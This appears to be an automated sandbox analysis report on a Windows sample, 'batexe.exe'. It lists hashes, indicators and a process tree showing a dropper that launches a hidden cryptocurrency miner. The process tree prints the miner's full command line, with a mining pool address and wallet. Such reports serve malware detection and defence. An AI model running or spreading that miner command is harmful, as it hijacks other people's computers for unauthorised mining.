73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
306s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
24/02/2024, 03:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
352	b2e.exe
3520	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3520	cpuminer-sse2.exe
3520	cpuminer-sse2.exe
3520	cpuminer-sse2.exe
3520	cpuminer-sse2.exe
3520	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4676-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4676 wrote to memory of 352	4676	batexe.exe	75
PID 4676 wrote to memory of 352	4676	batexe.exe	75
PID 4676 wrote to memory of 352	4676	batexe.exe	75
PID 352 wrote to memory of 1536	352	b2e.exe	76
PID 352 wrote to memory of 1536	352	b2e.exe	76
PID 352 wrote to memory of 1536	352	b2e.exe	76
PID 1536 wrote to memory of 3520	1536	cmd.exe	79
PID 1536 wrote to memory of 3520	1536	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4676
- C:\Users\Admin\AppData\Local\Temp\1AF5.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\1AF5.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1AF5.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\211F.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1536
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3520

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1AF5.tmp\b2e.exe

Filesize
3.0MB

MD5
2bd5f89ebae0349930e04035bc15d3da

SHA1
4ac97949988e13ba12f0cda813d2f2e1abbec241

SHA256
625cc3af7a4f052a6e039293b4f52cbadd525b1e7937eb43b6595e3fa8556fbe

SHA512
a1f02b2253f94604ebc9dbbca38ac00384d40ae525459ec7ec98d07f26cf49098ad02ec2a382f0920bd337383fa50236e5ed55ae7045dca29590cd139e959fdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\1AF5.tmp\b2e.exe

Filesize
3.7MB

MD5
81c33a23193e651f74b41d2b23c533ea

SHA1
a59c3a656d5386b8b8908baad382a830f7e73e9b

SHA256
d99cf4b6727ae3dc00e4487064184fab87023e5377c4b221dcff827aa93a2032

SHA512
c18a25d092f8ba556dc0a77a120f79115af06dfe6d7a4585a7878ba67287c07095c45b06be728b7738b10f230a574a3478602f3c01e2c551d755cf29848bd9d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\211F.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
411KB

MD5
4e81fb920730f3a167c6b8f03ae9470d

SHA1
d75e18c9aaaac4e5915615024fd46055c6f0cd2a

SHA256
28c9f59edf70233eb81c3a7e5983d3703cdc622f108c2b763073587df56654c3

SHA512
2f62d123438795fa99fd0cd1873dc23f6d7222beac06267aee47dfc8b3b639d64b127492a570de52cb2e540c2fcee3638c5dd2f1ff6243c46493caa9c1a6dd7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
280KB

MD5
4598fc8f3fb5c986af56e7dd7c01299c

SHA1
f0b2e38a06e6ac863fcfc51d4a3bbba8a702a715

SHA256
0d6afc0f99713627b38fe9938b43b0633ee7bb68c2caa1ab667571b3fb89fec1

SHA512
9ab97c627a576420002a87287f5cf6d1736557bc9478c34a32216cf02e490f94d75250d1b50488d009c0db87aac420e92317b110294e8f71b2ca2d62389fd9cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
284KB

MD5
b774d631f4d876f5e6e3f3a38dd8d85e

SHA1
b616e86fd36d2f576a9765378141ba9e586da31e

SHA256
41a19eabf6c60168dce463af855143f0ae6c3be160867a4b7bb84bc1ad7346f8

SHA512
a71479c82731c15e40c820d8914e8d9fe88cedda4b02a5f6012aaac2d3db41dc58ddcab517b77f44f91056c4d62d49f11047c6cdd974843619116b0dacd2e963

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
376KB

MD5
e864a222b6a85e1ebea65b87bfd207e5

SHA1
7bbb324fd6c20623886e0eac2bb2e3495423d509

SHA256
d476fc0d9e36160b6a1bcade2192d27d302d45ade9554f8e0a9dcfd71521b4f4

SHA512
2547a7ef0715848d2f98667be6c787c7ed5bd4dd48cbeb3bdef6895bdf71e4a2ef60055f0068f0c916ac1ada2d207ed07a142bf536614e00055ac899bc84dc67

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
204KB

MD5
53c14392c2128fc046e58a7f94342bf5

SHA1
7fe94b07830fe21defd52e5b5acf52bf6cbc3bdd

SHA256
496beb982311a35adb4f67fdd7ec6761fa2fec3a02182a9b68d4471f37090ddf

SHA512
d6b76e1d362bfff02daf43f7514cdb702f657271d9c7deeafd8a25ea83cd7da6bc6edd1d47775c4e121356e2fceac5e31aec0e2ce3ba48d7f1d894e1f6609915

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
136KB

MD5
6a6417fc5378f3e88d31cd76e09337b3

SHA1
1f887cd9d02b763e3e6b8d32ae1be9603cd591d3

SHA256
b12bb3a2952ce98f7b3e1342fa7cd95faa7020a5a775c5a2df29818fa9257936

SHA512
770510864f4411eaf135c41316590e132e3f08f2c977a4677ff929245b7f7eb0e2332abdd37315c5800f391591fc96c56962cbd7210e39eaef2a867b23530c10

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
135KB

MD5
2d6b8d76b1be9a1a8893dd428a01cc17

SHA1
74f32c44d5d7cbfc78ae8b93f30cc83a3eec9131

SHA256
d08653e8ed5e0daa206cd35b413cb89ccf867bff54cd281832063ae8bdd5b098

SHA512
60bdcd4c78f8e18afd7435ce9f484f2be7f402251ffc97b93427dc9ec5d685c13a3f0b3186d7f523773bf4e1004abc44d16509131b3b0c7ad3a6cf173e97ac70

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
197KB

MD5
d6ea20ee8456bcbce532415ea9d0728e

SHA1
1fd7d4ed3977bddda9a63138bd11653c678da4bc

SHA256
f5624ae961467b604197fcc6b93cb0a0eb0cc34e234d366c1c55a53b20ef6404

SHA512
6ad0f52aea44b2e48e0ff9916e84114807b3331915bf8fbf5699bb8b0514314563a2a66fe149af898436cb5f3b2ca2f800d140eb04071d161e4eb131afff6023

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
240KB

MD5
2523d339cc1ca2a58cef84c97e1c3ae3

SHA1
c7ce14414feb7c11d0b9532c79c64d71bcd5734d

SHA256
a12e7ef3ccb8c9ea41a64e5b0393e5f9e6eeec9b7941131c4115f93a4448066e

SHA512
c9dd4df90fc1e5d77bccb8b8f9ea705368a703b48f3f82029dfe4a6b6c76faacd3ca8adae8b0ef6e0cbcd04d5ac2851d84d688394e6541a856ad0451142541a7

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
141KB

MD5
01a95edd1203ce37f005cb048b9ad812

SHA1
32c0428cc611ab4c521b45bfeda52d5a32f6838a

SHA256
553c7d9649d6f5bec011d312c064e14d876b5f585f29d7f88780eef0270b3827

SHA512
fa2946e56465fe3c3493841c45f08d846d340fcaa8b1b18af7b7dcfbd699d0ddd5842cc400b3f8e83620981cf4bca8c80b4713687578941fd48d7cfa49774464

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
179KB

MD5
2c6da7c4ae2889ab1775543414ae2607

SHA1
49596c3d9923fe88e173b75dc9576415a599efda

SHA256
2201bce34a7ab88ee7b41acadaeb4bedea2a7842beefcb9111ab351e5e0bead5

SHA512
8b37775662464f0422b235f3895f25a21a07d0df20dae486acbcbf93ab54e8b2f4a2200b7e570e183b37b27fd5ebab6cc30f95891d7904855499894e3320010e

Download Submit
memory/352-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/352-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3520-44-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/3520-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3520-43-0x0000000061DB0000-0x0000000061E48000-memory.dmp

Filesize
608KB

Download
memory/3520-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3520-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3520-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4676-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download